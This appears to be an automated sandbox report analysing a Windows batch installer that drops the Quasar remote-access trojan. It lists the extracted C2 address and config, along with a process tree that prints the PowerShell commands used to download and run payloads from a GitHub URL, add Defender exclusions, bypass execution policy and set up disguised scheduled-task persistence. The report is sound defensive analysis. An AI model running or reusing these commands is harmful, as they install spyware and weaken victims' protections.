Overview

overview

10

Static

static

1

CritScript...er.bat

windows7-x64

8

CritScript...er.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-11-2024 17:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CritScriptInstaller.bat

  • Size

    6KB

  • MD5

    a3ea9257f9f074a20df56d8978be9e77

  • SHA1

    68d029092c7a591aac215e25269329c3c3859436

  • SHA256

    32d2658a968790aa0039cf23fd097da860b938fb07d8d0b2f6779a71f40817b1

  • SHA512

    a61143e0680eb03fbf625da8a58aa338e88f0e12c65a3c07b2c10eead02e7a753d64e3d4271c34b04941ef772d3e772f28b53355b1a46ce4fc6aafff164c3b46

  • SSDEEP

    192:k+6tCGPbseHYtPpUaYIKopCA8KyiXn2rCxHF:kviPpUaYIKor2i

Score
10/10
quasarddnsdiscoveryexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

DDNS

C2

193.161.193.99:32471

Mutex

807f3187-d087-4fff-beff-e73293a32af8

Attributes
  • encryption_key

    81A0C14D4C705B3C678E573C849DE7F6A3671A8B

  • install_name

    jusched.exe

  • log_directory

    CachedLogs

  • reconnect_delay

    3000

  • startup_key

    Java Update Scheduler

  • subdirectory

    Java

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 3 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Powershell Invoke Web Request.

    execution
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CritScriptInstaller.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/CritScript.bat' -OutFile CritScript.bat"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4328
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K CritScript.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4132
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:2328
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin/Desktop'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin/Downloads'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3588
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin/AppData/'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3568
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/CritScript.exe' -OutFile CritScript.exe"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4812
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/ahk.ico' -OutFile ahk.ico"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2316
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/shortcut.ps1' -OutFile shortcut.ps1"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3396
        • C:\Users\Admin\AppData\Local\Temp\CritScript.exe
          CritScript.exe
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:4004
          • C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE
            "C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE"
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4384
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f
              5⤵
              • Scheduled Task/Job: Scheduled Task
              PID:4600
            • C:\Users\Admin\AppData\Roaming\Java\jusched.exe
              "C:\Users\Admin\AppData\Roaming\Java\jusched.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3940
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f
                6⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1500
        • C:\Windows\system32\timeout.exe
          timeout /t 5 /nobreak
          3⤵
          • Delays execution with timeout.exe
          PID:1156
        • C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE
          jusched.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4128
        • C:\Windows\system32\timeout.exe
          timeout /t 5 /nobreak
          3⤵
          • Delays execution with timeout.exe
          PID:1908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\shortcut.ps1"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Deletes itself
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1128
    • C:\Windows\system32\OpenWith.exe
      C:\Windows\system32\OpenWith.exe -Embedding
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4964

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\jusched.exe.log
      Filesize

      1KB

      MD5

      baf55b95da4a601229647f25dad12878

      SHA1

      abc16954ebfd213733c4493fc1910164d825cac8

      SHA256

      ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

      SHA512

      24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      3b2a05f3fbe16d06391db3335944b77c

      SHA1

      1ecab602face79029c53e2dddb49a12b7a808a79

      SHA256

      185551abd0332fddc9593c6f5e6d982c4917ce2e418d56ac45b0537c13ed5d60

      SHA512

      782ecdda938503b560c23a12c3ec5ab8c81590d36f3a7e866cd27c2d26c30339fc71ef770be0d422fd43ff8fb2f3ac665776c86be4a9d9d0a2e9cd9236ce0fc5

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      7ab00d2b8ad3a0a8426f6a535086b700

      SHA1

      5b912f4345328372093354ff2ba6a932fef4a8ab

      SHA256

      cc27d1633ff5a4401c75569e6cd8f98e7ab09f01b8dfb0399f82efe197e0ca0c

      SHA512

      839e5fbdcc406cee2f37a156ccbb772a80a0231508a7925f95e162990b31ea8366442fcd6073c9035905b47a34d60a3434cc776babf9d49521663b8d3e400584

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      8a424e81b5a6078deff05e153c04a0ee

      SHA1

      bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b

      SHA256

      79ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3

      SHA512

      aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      446dd1cf97eaba21cf14d03aebc79f27

      SHA1

      36e4cc7367e0c7b40f4a8ace272941ea46373799

      SHA256

      a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

      SHA512

      a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      1dffbab5ecc6d06e8b259ad505a0dc2a

      SHA1

      0938ec61e4af55d7ee9d12708fdc55c72ccb090c

      SHA256

      a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

      SHA512

      93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      86f1b58eabec7e21739a4df55d272c7c

      SHA1

      9df879518b19a9c8e2633696a2096990fe99e9ab

      SHA256

      2fa1176643443c45f51312be88effd28bcf7bb4309123cee363daa02afcf07a8

      SHA512

      20d60b79c69ebc1eb695227abbd014625e1dfe527c0c31f245169e09d3c61238a7b357a1a252b594424a0dfa9abde7a3123b5b8660342a7e32dbccb6fbc5ea22

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\CritScript.bat
      Filesize

      2KB

      MD5

      42b967e318ec3384c82049f18bff79f5

      SHA1

      c719bfd3fe63989c68c170e59ae8aa5ccb479b25

      SHA256

      6a5596feba2d73f3390ede572e09c3edce0da3df1e679838cdb51dc7c1df805e

      SHA512

      b578ada683bfa871a19baad1c62b04315c2fdb4e193371971202e0476470e75fe8a9fc5cb75b6a79f73657ce35a1e10929f5df585634fcb9a755b6ba4193f166

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\CritScript.exe
      Filesize

      3.2MB

      MD5

      c28dc010fc5198442496bc07dd50cd5d

      SHA1

      0f90a005815c2700a65ea85ae86f13a182cc11e6

      SHA256

      1b701daded4124260a49040d83dec15c627b8e4a1a04dc378aae7fecfca3abf3

      SHA512

      7c94bafa48db045a864a778a010a7d1d03204828bd103a86c1267732a51260b0e689a799cc7e95410ceedd1254fb91aa3f19f62efa3e41e40be645862a4e07e2

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE
      Filesize

      3.1MB

      MD5

      bd4dcbdfdb5fdc1f95bd1168f166153a

      SHA1

      9db60cf0f8a8b88d3c4601df25963536aaeb1884

      SHA256

      902bea9e4aeeed4e0b5d30a9cbcc6f9f1fc687b79c3fdde8258b94b410d1797a

      SHA512

      26ef32fe83a4e6c9c293910e96da431ba6b46b645969b9c56808d451875b0a3f4baad697362d7342f9d4822b84682b7705c2097839c796369503ffbfaa72aab2

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\ZOMBIES.AHK
      Filesize

      6KB

      MD5

      4378ec2852917fed7f557291e72251a6

      SHA1

      104b3e944a713760b1fe491679ff3aa0af32298b

      SHA256

      2ba38af1ffa558f31af78ae94c3369d92366838d5cb1e5c01c58369bc92ac914

      SHA512

      162541d9cf8facddc824e65c0a9eb5760c95bf011ad69fdbd79890d9b44324b7e25cc3011ef2a9d0bdd351122148b8e5e9e627eb754f5383dd64bd35bd84db56

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lptya22h.tnf.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\shortcut.ps1
      Filesize

      2KB

      MD5

      0bd19f7c1c4e8b5ed89da56ae5f8adb0

      SHA1

      a2384a83aea7d7568fc8ebd280b7722b0efd6902

      SHA256

      62ec8d3ae53114ba6d6d2a41ee59dd4866e7cd8e2fcbd6793b0cc40bc85e622f

      SHA512

      dbd7268491aa5ec39e89f71febcdc18cb6c96bbba617a1734eef55711ed70c3bf78960e94e8595e9d3b618b9cfc2ab9ff4d8e0c73d97a0c77b504b36be573f53

      Download Submit

    • memory/3908-29-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3908-33-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3908-30-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3908-32-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3940-116-0x000000001BD40000-0x000000001BD90000-memory.dmp

      Filesize

      320KB

      Download

    • memory/3940-117-0x000000001BE50000-0x000000001BF02000-memory.dmp

      Filesize

      712KB

      Download

    • memory/4328-16-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4328-12-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4328-11-0x00007FFCD4140000-0x00007FFCD4C01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4328-0-0x00007FFCD4143000-0x00007FFCD4145000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4328-6-0x000001979C990000-0x000001979C9B2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4384-108-0x0000000000E80000-0x00000000011A4000-memory.dmp

      Filesize

      3.1MB

      Download